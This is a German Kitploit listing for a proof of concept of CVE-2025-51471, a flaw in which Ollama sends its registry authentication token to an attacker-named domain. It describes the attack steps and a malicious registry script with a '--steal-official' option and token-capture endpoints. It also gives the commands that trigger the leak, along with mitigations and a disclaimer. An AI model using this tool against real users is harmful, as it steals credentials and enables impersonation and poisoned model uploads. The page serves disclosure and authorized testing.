Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-51471-POC — Dieses PoC dient ausschließlich zu Bildungs- und autorisierten Sicherheitstestzwecken. Verwenden Sie es NICHT gegen Systeme, die Ihnen nicht gehören. | Kitploit
Tools/GitHubGitHub/ajtazer/cve-2025-51471-poc
SchwachstellenanalyseExploitationWebsicherheitAuthentifizierungRed Teaming
GitHubajtazer/cve-2025-51471-poc

CVE-2025-51471-POC

Dieses PoC dient ausschließlich zu Bildungs- und autorisierten Sicherheitstestzwecken. Verwenden Sie es NICHT gegen Systeme, die Ihnen nicht gehören.

Repository anzeigen
22vor 8 MonatenNoch nicht geprüft
Webseite

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-51471 - Ollama-PoC zur domänenübergreifenden Token-Offenlegung

CVE-2025-51471 Ollama CVSS

Autor: ajtazer

🔥 Übersicht

Dieses Repository enthält einen Proof of Concept (PoC) für CVE-2025-51471, eine Schwachstelle zur Offenlegung von Authentifizierungstokens über Domänen hinweg, die alle Versionen von Ollama (einschließlich der neuesten) betrifft.

📋 Beschreibung der Schwachstelle

Wenn Ollama ein Modell von einem HTTPS-Server lädt, der mit 401 Unauthorized antwortet, folgt es der realm-URL des WWW-Authenticate-Headers, [...]

ohne zu prüfen, ob sie zur gleichen Domäne gehört

Dies ermöglicht einem Angreifer:

  1. Einen bösartigen „Registry“-Server einzurichten
  2. Einen Benutzer dazu zu verleiten, ein Modell von diesem Server zu laden
  3. Eine 401-Antwort mit einem WWW-Authenticate-Header zurückzusenden, der auf einen vom Angreifer kontrollierten Endpunkt verweist
  4. Ollama sendet sein Ed25519-signiertes Authentifizierungstoken blind an den Angreifer
  5. Der Angreifer erfasst das Token

Auswirkungen

  • Zugriff auf private Modelle auf registry.ollama.ai
  • Bösartige Modelle unter der Identität des Opfers pushen
  • Sich als das Opfer in der Ollama-Registry ausgeben

🚀 Schnellstart

Voraussetzungen

  • Python 3.7+
  • Flask (pip install flask)
  • Ollama (beliebige Version)

Installation

root@kitploit:~
git clone https://github.com/ajtazer/CVE-2025-51471-PoC.git
cd CVE-2025-51471-PoC
pip install flask

Ausführen des PoC

  1. Starten Sie den bösartigen Registry-Server (HTTP-Modus):
root@kitploit:~
python3 malicious_registry.py --no-ssl
  1. Stellen Sie in einem weiteren Terminal sicher, dass Ollama läuft:
root@kitploit:~
ollama serve
  1. Lösen Sie die Schwachstelle aus:
root@kitploit:~
# Mit der curl-API
curl http://localhost:11434/api/pull -d '{"model": "localhost:8080/malicious/model", "insecure": true}'

# ODER mit der ollama-CLI
ollama pull --insecure localhost:8080/malicious/model
  1. Achten Sie im Server-Terminal auf erfasste Tokens!

🎬 Demo (PoC-Video)

Ich habe diesen PoC in einem kurzen Video demonstriert – sehen Sie es sich hier an:

YouTube – PoC-Demo

Hinweis (macOS-HTTPS-Modus): Wenn Sie den HTTPS-Modus verwenden, fügen Sie das generierte Zertifikat zu Ihrem Schlüsselbund hinzu oder verwenden Sie den HTTP-Modus mit --no-ssl.

📖 Verwendungsoptionen

root@kitploit:~
python3 malicious_registry.py [-h] [--port PORT] [--no-ssl] [--steal-official]

Options:
  --port, -p PORT       Port to listen on (default: 8080)
  --no-ssl              Use HTTP instead of HTTPS
  --steal-official, -s  Redirect to steal registry.ollama.ai tokens
  --no-verbose          Disable verbose output

🔧 API-Endpunkte

EndpointBeschreibung
/v2/*Fake-Registry-Endpunkt (löst Exploit aus)
/v2/tokenEndpunkt zum Erfassen von Tokens
/tokensAlle erfassten Tokens anzeigen (JSON)
/healthServer-Statusprüfung

🛡️ Gegenmaßnahmen

  1. Modelle nur aus vertrauenswürdigen Quellen laden
  2. Beim Laden von Modellen aus Registrys Dritter vorsichtig sein
  3. Siehe PR #10750 für den offiziellen Fix

📝 Danksagungen

  • Autor: ajtazer
  • Ursprüngliche Forscher:
    • Mohammed Benhelli (@FuzzingLabs)
    • Patrick Ventuzelo (@FuzzingLabs)
    • Huntr-Bericht

⚠️ Haftungsausschluss

Dieser PoC dient ausschließlich Bildungs- und autorisierten Sicherheitstestzwecken. Verwenden Sie ihn nicht gegen Systeme, die Ihnen nicht gehören.


Mit ❤️ erstellt mit Antigravity

Tool herunterladen